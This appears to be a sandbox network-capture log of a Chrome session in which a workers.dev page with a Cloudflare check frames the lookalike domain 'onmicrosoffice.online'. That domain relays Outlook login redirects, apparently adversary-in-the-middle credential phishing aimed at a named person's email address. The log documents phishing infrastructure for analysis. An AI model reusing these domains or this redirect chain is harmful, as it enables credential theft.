2024-04-24 13:24:39 UTC	1127	IN	Data Raw: 55 6d 46 6b 4e 48 43 45 68 44 43 54 68 45 53 6b 6f 52 44 51 39 53 4c 79 30 75 4c 79 55 34 53 6c 41 57 51 54 4e 44 51 6c 70 56 55 32 42 6a 4e 6a 4d 31 59 69 74 4c 4b 43 6c 4e 63 57 42 67 63 6b 39 6a 4d 47 68 59 57 55 31 4c 57 56 78 70 4f 58 41 36 62 46 6c 55 63 33 78 58 65 34 70 65 59 47 47 50 52 6c 2b 4b 66 49 74 55 6a 59 42 78 55 6c 71 4c 6d 31 4f 59 56 58 70 77 6b 33 42 6a 58 49 47 67 5a 4b 5a 6e 6d 35 56 73 6e 4b 69 52 72 4c 43 74 6f 47 32 74 67 34 75 4e 67 37 4f 4e 6d 35 39 31 76 6e 69 53 77 6f 4f 33 6a 6e 32 32 70 5a 36 6e 69 73 4b 6c 6e 62 6d 63 6a 38 72 41 6f 6f 36 75 71 64 4f 72 31 61 2b 57 72 35 33 66 6d 5a 7a 63 75 38 53 68 30 4c 33 6d 32 39 2f 59 72 4b 72 68 78 73 65 6f 79 4c 79 74 35 72 50 4a 35 39 50 74 75 4f 62 62 33 38 76 72 32 66 53 37 78 Data Ascii: UmFkNHCEhDCThESkoRDQ9SLy0uLyU4SlAWQTNDQlpVU2BjNjM1YitLKClNcWBgck9jMGhYWU1LWVxpOXA6bFlUc3xXe4peYGGPRl+KfItUjYBxUlqLm1OYVXpwk3BjXIGgZKZnm5VsnKiRrLCtoG2tg4uNg7ONm591vniSwoO3jn22pZ6nisKlnbmcj8rAoo6uqdOr1a+Wr53fmZzcu8Sh0L3m29/YrKrhxseoyLyt5rPJ59PtuObb38vr2fS7x
2024-04-24 13:24:39 UTC	1369	IN	Data Raw: 38 65 31 0d 0a 4d 61 6e 47 56 55 70 52 56 65 56 5a 65 65 6e 4f 61 58 6e 5a 2b 70 71 47 47 63 4b 52 2f 70 4a 79 6b 70 33 32 45 71 36 32 67 6e 61 69 4c 6b 58 4e 7a 74 62 53 52 65 5a 4b 56 66 72 4b 58 66 61 4a 2b 72 33 32 64 75 70 75 69 6f 4d 32 4f 6a 61 6e 45 76 63 69 2f 31 5a 53 52 72 39 53 56 33 4c 48 57 73 5a 79 33 6d 37 54 6b 30 4e 65 37 35 4d 4c 62 34 71 58 49 71 4b 32 73 37 2b 50 62 37 36 2b 75 79 74 4c 4d 39 61 7a 46 74 65 36 2b 76 64 54 79 31 4f 73 45 42 41 49 49 34 77 66 7a 79 4d 62 47 37 73 48 49 43 2b 58 52 39 52 41 44 36 76 63 57 46 76 72 79 45 51 6e 32 44 4e 6b 64 32 52 62 65 49 42 30 43 34 52 54 32 44 43 67 6f 47 52 7a 6f 47 2b 77 4f 4e 77 66 70 46 6a 67 6b 4e 51 67 38 4b 78 63 7a 50 78 59 58 44 7a 39 42 2b 51 6b 38 48 42 38 32 51 44 68 51 54 Data Ascii: 8e1ManGVUpRVeVZeenOaXnZ+pqGGcKR/pJykp32Eq62gnaiLkXNztbSReZKVfrKXfaJ+r32dupuioM2OjanEvci/1ZSRr9SV3LHWsZy3m7Tk0Ne75MLb4qXIqK2s7+Pb76+uytLM9azFte6+vdTy1OsEBAII4wfzyMbG7sHIC+XR9RAD6vcWFvryEQn2DNkd2RbeIB0C4RT2DCgoGRzoG+wONwfpFjgkNQg8KxczPxYXDz9B+Qk8HB82QDhQT
2024-04-24 13:24:39 UTC	911	IN	Data Raw: 75 6b 6d 31 35 65 5a 78 78 68 33 56 5a 6a 59 78 75 6c 70 47 43 6d 71 4e 2f 6e 4a 6d 71 62 71 79 44 72 49 56 78 6b 61 35 32 74 35 4b 33 73 34 31 38 74 71 65 72 64 6e 71 72 6f 71 36 32 73 4d 65 42 77 34 6d 46 72 4c 2b 35 6e 63 7a 4b 79 61 57 4d 31 70 61 79 79 5a 57 77 71 73 6e 50 6e 71 36 39 33 4c 53 63 32 4a 33 52 75 73 44 6c 76 70 32 70 70 4e 65 73 71 65 2f 46 33 4f 4c 6d 79 37 43 7a 2b 75 54 37 75 2f 66 53 2f 4e 32 35 37 66 50 59 39 2f 33 5a 75 67 50 72 33 74 66 47 2b 51 7a 4e 79 74 48 46 37 42 63 50 31 4f 7a 51 37 2b 37 37 48 42 6b 64 36 52 30 65 38 66 6f 69 45 4e 6b 41 4b 77 44 6f 36 79 63 45 42 77 59 76 46 42 49 56 37 41 73 53 4e 76 49 31 39 52 72 32 2f 68 73 55 4f 2f 34 58 48 30 64 43 4a 78 46 46 49 45 55 39 52 55 67 65 4a 55 78 4f 51 54 35 4a 4c 44 Data Ascii: ukm15eZxxh3VZjYxulpGCmqN/nJmqbqyDrIVxka52t5K3s418tqerdnqroq62sMeBw4mFrL+5nczKyaWM1payyZWwqsnPnq693LSc2J3RusDlvp2ppNesqe/F3OLmy7Cz+uT7u/fS/N257fPY9/3ZugPr3tfG+QzNytHF7BcP1OzQ7+77HBkd6R0e8foiENkAKwDo6ycEBwYvFBIV7AsSNvI19Rr2/hsUO/4XH0dCJxFFIEU9RUgeJUxOQT5JLD
2024-04-24 13:24:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49771	104.17.2.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:39 UTC	486	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/677264152:1713960777:cbIXwftb7jRjxhN42jiBklFyaR8QTE9L7gvOtH3VLU8/879669880fea0acd/a7423da5d113469 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:40 UTC	377	IN	HTTP/1.1 400 Bad Request Date: Wed, 24 Apr 2024 13:24:39 GMT Content-Type: application/json Content-Length: 7 Connection: close cf-chl-out: WybGB76MPrn6hCZUdbcjJQ==$QYTfgy+fCdc8HF9/aq6mXQ== cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 87966a35d871a984-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:40 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49769	104.21.52.206	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:39 UTC	976	OUT	POST /?qrc=barbara.rentler@ros.com HTTP/1.1 Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev Connection: keep-alive Content-Length: 603 Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:39 UTC	603	OUT	Data Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 37 56 46 58 5a 72 74 32 35 71 4b 37 2d 7a 2d 57 37 4a 34 47 78 68 65 7a 42 6a 39 4f 65 6a 71 42 6e 43 68 5a 5f 50 4e 58 48 62 71 7a 36 57 36 61 47 45 61 74 64 45 41 63 72 72 37 46 6d 39 68 69 6b 48 33 54 52 61 4f 6b 49 68 6c 64 37 31 52 38 58 39 6d 6b 61 78 6e 6f 74 6a 51 39 45 45 69 52 4a 57 37 5a 6f 67 34 7a 4a 37 4c 73 4b 6e 62 4c 38 46 68 71 5a 78 42 34 2d 5f 50 47 5f 4e 4f 56 38 79 38 32 59 4b 4a 75 36 7a 46 42 4a 5f 6c 35 30 77 78 39 45 71 49 78 63 71 77 64 41 4f 30 54 6d 6a 72 43 58 41 65 6d 32 75 57 4e 69 75 71 69 51 4d 76 6b 50 6c 45 31 43 52 4a 75 33 2d 53 76 6c 77 6e 63 58 43 59 6d 51 6f 6f 48 68 66 58 65 67 78 2d 77 59 50 30 41 4f 38 70 6f 43 38 71 61 55 6d 66 46 6a 7a 51 Data Ascii: cf-turnstile-response=0.7VFXZrt25qK7-z-W7J4GxhezBj9OejqBnChZ_PNXHbqz6W6aGEatdEAcrr7Fm9hikH3TRaOkIhld71R8X9mkaxnotjQ9EEiRJW7Zog4zJ7LsKnbL8FhqZxB4-_PG_NOV8y82YKJu6zFBJ_l50wx9EqIxcqwdAO0TmjrCXAem2uWNiuqiQMvkPlE1CRJu3-SvlwncXCYmQooHhfXegx-wYP0AO8poC8qaUmfFjzQ
2024-04-24 13:24:40 UTC	589	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:40 GMT Content-Type: text/html; Content-Length: 1184 Connection: close status: 200 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8tmL9J89wjMRLiJZBFpkGEbyFzS16BDFhg%2Fh15t8%2FSjKnR%2Fh5FgPebC43IWHZcg7CFZZU01%2BSMkdu%2B%2BRwnKGj0mjydM2MabXoIJkZBUsV0V2CPmDcO2w%2BAKeKektc8eDDvLLCdXJoYCzwP9cKdy4FZ609WPJRI3il6tbXGP1Fyg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87966a34bc420ff0-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:40 UTC	780	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 2a 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 66 69 6c 65 73 79 73 74 65 6d 3a 20 61 62 6f 75 74 3a 20 77 73 3a 20 77 73 73 3a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 2a 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 2a 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 75 6e 73 61 66 65 2d 69 Data Ascii: <!doctype html><html><head><meta http-equiv="Content-Security-Policy" content="default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-i
2024-04-24 13:24:40 UTC	404	IN	Data Raw: 4e 6c 4c 6d 39 75 62 47 6c 75 5a 53 49 73 49 6d 52 76 62 57 46 70 62 69 49 36 49 6d 39 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 6d 61 57 4e 6c 4c 6d 39 75 62 47 6c 75 5a 53 49 73 49 6d 74 6c 65 53 49 36 49 6c 63 77 53 44 52 52 64 45 74 52 64 6a 64 69 63 69 49 73 49 6e 46 79 59 79 49 36 49 6d 4a 68 63 6d 4a 68 63 6d 45 75 63 6d 56 75 64 47 78 6c 63 6b 42 79 62 33 4d 75 59 32 39 74 49 69 77 69 61 57 46 30 49 6a 6f 78 4e 7a 45 7a 4f 54 59 31 4d 44 67 77 4c 43 4a 6c 65 48 41 69 4f 6a 45 33 4d 54 4d 35 4e 6a 55 79 4d 44 42 39 2e 5a 35 4a 30 58 5a 76 7a 33 31 46 77 41 44 4e 71 67 71 52 75 39 79 64 4a 41 31 79 47 57 70 65 6a 31 6b 5f 69 51 67 77 55 59 37 34 22 20 61 6c 6c 6f 77 66 75 6c 6c 73 63 72 65 65 6e 3d 22 74 72 75 65 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 Data Ascii: NlLm9ubGluZSIsImRvbWFpbiI6Im9ubWljcm9zb2ZmaWNlLm9ubGluZSIsImtleSI6IlcwSDRRdEtRdjdiciIsInFyYyI6ImJhcmJhcmEucmVudGxlckByb3MuY29tIiwiaWF0IjoxNzEzOTY1MDgwLCJleHAiOjE3MTM5NjUyMDB9.Z5J0XZvz31FwADNqgqRu9ydJA1yGWpej1k_iQgwUY74" allowfullscreen="true" style="posit

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49772	89.116.187.236	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:41 UTC	1015	OUT	GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL29ubWljcm9zb2ZmaWNlLm9ubGluZSIsImRvbWFpbiI6Im9ubWljcm9zb2ZmaWNlLm9ubGluZSIsImtleSI6IlcwSDRRdEtRdjdiciIsInFyYyI6ImJhcmJhcmEucmVudGxlckByb3MuY29tIiwiaWF0IjoxNzEzOTY1MDgwLCJleHAiOjE3MTM5NjUyMDB9.Z5J0XZvz31FwADNqgqRu9ydJA1yGWpej1k_iQgwUY74 HTTP/1.1 Host: onmicrosoffice.online Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:41 UTC	312	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=W0H4QtKQv7br; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY; path=/; samesite=none; secure; httponly location: /?qrc=barbara.rentler%40ros.com Date: Wed, 24 Apr 2024 13:24:41 GMT Connection: close Transfer-Encoding: chunked
2024-04-24 13:24:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49773	89.116.187.236	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:41 UTC	808	OUT	GET /?qrc=barbara.rentler%40ros.com HTTP/1.1 Host: onmicrosoffice.online Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY
2024-04-24 13:24:42 UTC	1202	IN	HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Pragma: no-cache Location: https://onmicrosoffice.online/owa/?login_hint=barbara.rentler%40ros.com Server: Microsoft-IIS/10.0 request-id: c58c7692-bf42-4c8f-810c-69522e8b0ef4 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: SJ0PR05CA0116, SJ0PR05CA0116 X-RequestId: a01bce57-a389-4922-992d-c37d4f7706f4 X-FEProxyInfo: SJ0PR05CA0116.NAMPRD05.PROD.OUTLOOK.COM X-FEEFZInfo: SJC MS-CV: knaMxUK/j0yBDGlSLosO9A.0 X-Powered-By: ASP.NET Date: Wed, 24 Apr 2024 13:24:41 GMT Connection: close Content-Length: 0 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49774	89.116.187.236	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:42 UTC	819	OUT	GET /owa/?login_hint=barbara.rentler%40ros.com HTTP/1.1 Host: onmicrosoffice.online Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY
2024-04-24 13:24:43 UTC	7304	IN	HTTP/1.1 302 Found content-length: 1380 Content-Type: text/html; charset=utf-8 Location: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ== Server: Microsoft-IIS/10.0 request-id: c0bb1d5f-f812-e2d2-bae4-ec7657897c63 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-CalculatedFETarget: SN4PR0501CU002.internal.outlook.com X-BackEndHttpStatus: 302, 302 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; expires=Thu, 24-Apr-2025 13:24:42 GMT; path=/;SameSite=None; secure Set-Cookie: ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; expires=Thu, 24-Apr-2025 13:24:42 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Thu, 24-Oct-2024 13:24:42 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; expires=Wed, 24-Apr-2024 14:24:42 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OptInPrg=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: SuiteServiceProxyKey=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; expires=Thu, 24-Apr-2025 13:24:42 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Thu, 24-Oct-2024 13:24:42 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; domain=onmicrosoffice.online; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; expires=Wed, 24-Apr-2024 14:24:42 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: OptInPrg=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: SuiteServiceProxyKey=; expires=Sun, 24-Apr-1994 13:24:42 GMT; path=/; secure Set-Cookie: X-OWA-RedirectHistory=ArLym14Bctf65mFk3Ag; expires=Wed, 24-Apr-2024 19:26:42 GMT; path=/;SameSite=None; secure; HttpOnly X-CalculatedBETarget: SA1PR05MB8595.namprd05.prod.outlook.com X-RUM-Validated: 1 X-RUM-NotUpdateQueriedPath: 1 X-RUM-NotUpdateQueriedDbCopy: 1 X-BeSku: WCS7 X-OWA-DiagnosticsInfo: 2;0;0 X-IIDs: 0 X-BackEnd-Begin: 2024-04-24T13:24:42.957 X-BackEnd-End: 2024-04-24T13:24:42.957 X-DiagInfo: SA1PR05MB8595 X-BEServer: SA1PR05MB8595 X-UA-Compatible: IE=EmulateIE7 X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 302 X-FEProxyInfo: SJ0PR05CA0099.NAMPRD05.PROD.OUTLOOK.COM X-FEEFZInfo: SJC X-FEServer: SN4PR0501CA0039, SJ0PR05CA0099 NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01} X-FirstHopCafeEFZ: SJC Date: Wed, 24 Apr 2024 13:24:42 GMT Connection: close Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
